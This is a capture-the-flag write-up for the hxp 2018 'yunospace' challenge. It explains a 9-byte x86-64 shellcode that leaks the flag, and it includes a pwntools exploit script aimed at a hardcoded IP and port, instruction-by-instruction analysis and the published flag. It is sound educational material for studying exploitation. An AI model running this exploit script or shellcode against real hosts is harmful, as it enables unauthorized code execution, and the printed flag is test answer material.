Rating: 4.0

> How does free code execution sound to you? If only the whole thing wasn’t that narrow.

`yunospace` was a very interesting challenge: the target was clear, but reaching it was tricky.

First, `yunospace` creates two empty mmapped regions at randomized addresses; these are used as the code region (rx) and the stack region (rw).

9 bytes are read from `stdin` and placed at the beginning of the code region. One character of the flag, at an index we choose, is placed right after our input.
Then all registers except `rsp`, which points into the middle of the stack region, are zeroed and execution jumps to our code.

So we have to write 9 bytes of machine code that, starting with an empty but working stack, print the flag character.

After some hours of experimenting and browsing the [Intel Assembly Manual](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf), this is what we came up with:

```python
from pwn import *

"""
000000: 0f 05 syscall
000002: 01 ca add edx,ecx
000004: 51 push rcx
000005: 5e pop rsi
000006: ac lods al,BYTE PTR ds:[rsi]
000007: 0f 05 syscall
"""

flag = ""
for i in range(58):
    # One connection per flag character: each run leaks a single byte.
    c = remote("195.201.127.119", 8664)
    c.recvuntil(b"today?\n")
    c.sendline(str(i).encode())
    c.recvuntil(b"please.\n")
    c.sendline(b"\x0f\x05\x01\xca\x51\x5e\xac\x0f\x05")
    # The output starts at code offset 3, so the flag byte (offset 9) is at index 6.
    out = c.recv(10)
    flag += chr(out[6])
    c.close()
    print(flag)
```

## So what is happening here?

```
00: 0f 05 syscall
```

Since all registers are `0`, this effectively does a `read(0, NULL, 0)`: the syscall tries to read 0 bytes from stdin into a NULL pointer. Conveniently this does not crash, but it has the very important side effect of loading the address of the instruction after the `syscall` into `rcx`. A rip-relative `lea` would need 7 bytes, and a `call`/`pop` combo would use 6 bytes. Together with the `push rcx`/`pop rsi` pair further down, this version uses only 4!
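The byte counts can be checked against hand-assembled encodings. The sketch below hardcodes the x86-64 encodings of three ways to get a code address into `rsi`; the dictionary name and the choice of `rsi` as the destination register are ours, for illustration only.

```python
# Hand-assembled x86-64 encodings for three ways to get a code address into rsi.
# The names here are illustrative; rsi is chosen because write() takes its buffer there.
candidates = {
    "lea rsi, [rip+0]": bytes.fromhex("488d3500000000"),
    "call $+5; pop rsi": bytes.fromhex("e8000000005e"),
    "syscall; push rcx; pop rsi": bytes.fromhex("0f05515e"),
}

# Count the bytes each variant occupies in the 9-byte budget.
sizes = {name: len(code) for name, code in candidates.items()}
for name, size in sizes.items():
    print(f"{size} bytes: {name}")
```

Note that the three variants do not yield exactly the same address (each gives the address of a different following instruction), which does not matter here because the length passed to `write` is generous.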

```
02: 01 ca add edx,ecx
```

This adds `ecx` to `edx`, which specifies the length for the `write` syscall. We just need `edx` to be >6 so that the flag character after our code is printed, so any big positive value works for us; we do not care about a page fault once we have received our output. Most importantly, this instruction has opcode `01`, which will be used later.

```
04: 51 push rcx
05: 5e pop rsi
```

This moves the 64-bit address from `rcx` to `rsi`, which specifies the buffer to print for `write`. It only needs 2 bytes because `push` and `pop` are two of the few instructions that do not need a REX prefix for 64-bit operands.
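To make the saving concrete, here is a small comparison against the obvious alternative, a 64-bit `mov`, using hand-assembled encodings. The variable names are ours.

```python
# mov rsi, rcx needs a REX.W prefix (0x48) in front of opcode 0x89 and its ModRM byte.
mov_rsi_rcx = bytes.fromhex("4889ce")
# push rcx; pop rsi are one-byte opcodes that default to 64-bit operands.
push_pop = bytes.fromhex("515e")

saved = len(mov_rsi_rcx) - len(push_pop)
print(f"mov: {len(mov_rsi_rcx)} bytes, push/pop: {len(push_pop)} bytes, saved: {saved}")
```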

```
06: ac lods al,BYTE PTR ds:[rsi]
```

`lodsb` loads the byte at the address pointed to by `rsi` into `al` and then increments `rsi`. So `al = [rsi]; rsi++`. Since `rsi` points to our `add edx,ecx` instruction, which has opcode `01`, this sets `al` to 1. The rest of `rax` is still 0 (the zero-byte `read` returned 0), so `rax` becomes 1, the syscall number for `write`! This was the last bit of magic we had to find to save that crucial last byte!

```
07: 0f 05 syscall
```

`write(0, <address of add + 1>, (32bit-truncated) <address of add>)`. This writes to `stdin` (not `stdout`!) since `rdi` is zero. But we still get the output on our terminal! (Thank you, Linux!) This behaviour means we do not have to set `rdi` to 1 to print to `stdout`, which saves us 2 bytes.
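The whole register dance can be traced in a toy model. This is only a sketch of the walkthrough above, not an emulator: no syscalls are made, `BASE` and `FLAG_CHAR` are made-up values, and the first `syscall` is assumed to return 0 in `rax` and leave the direction flag clear.

```python
# Toy model of the 9-byte payload; nothing here talks to the real service.
BASE = 0x7F3A1C2D5000        # hypothetical randomized address of the code region
FLAG_CHAR = ord("h")         # hypothetical flag byte placed right after our input

payload = bytes.fromhex("0f0501ca515eac0f05")
memory = payload + bytes([FLAG_CHAR])      # contents of the code region at BASE

rax = rdx = rsi = rdi = 0                  # all registers start zeroed
rcx = BASE + 2                             # 1st syscall: rcx = address of the next instruction
rdx = (rdx + rcx) & 0xFFFFFFFF             # add edx, ecx: 32-bit result, upper half cleared
rsi = rcx                                  # push rcx; pop rsi
rax = (rax & ~0xFF) | memory[rsi - BASE]   # lodsb: al = [rsi] ...
rsi += 1                                   # ... then rsi++ (direction flag assumed clear)

# 2nd syscall is write(rdi, rsi, rdx); we only model the bytes that exist in `memory`.
start = rsi - BASE
out = memory[start:start + rdx]
print(f"rax={rax} rdi={rdi} out={out.hex()} flag_char={chr(out[6])}")
```

The flag byte lands at index 6 of the output because the write starts at code offset 3 and the flag character sits at offset 9, which is why the exploit script reads `out[6]`.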

The program subsequently crashes, but we already have what we want, so we don't care.

Flag is `hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng}`

Original writeup (https://www.sigflag.at/blog/2018/writeup-hxp-yunospace/).
kowu, Dec. 11, 2018, 2:53 p.m.

Probably not the intended solution, but definitely the most amazing one.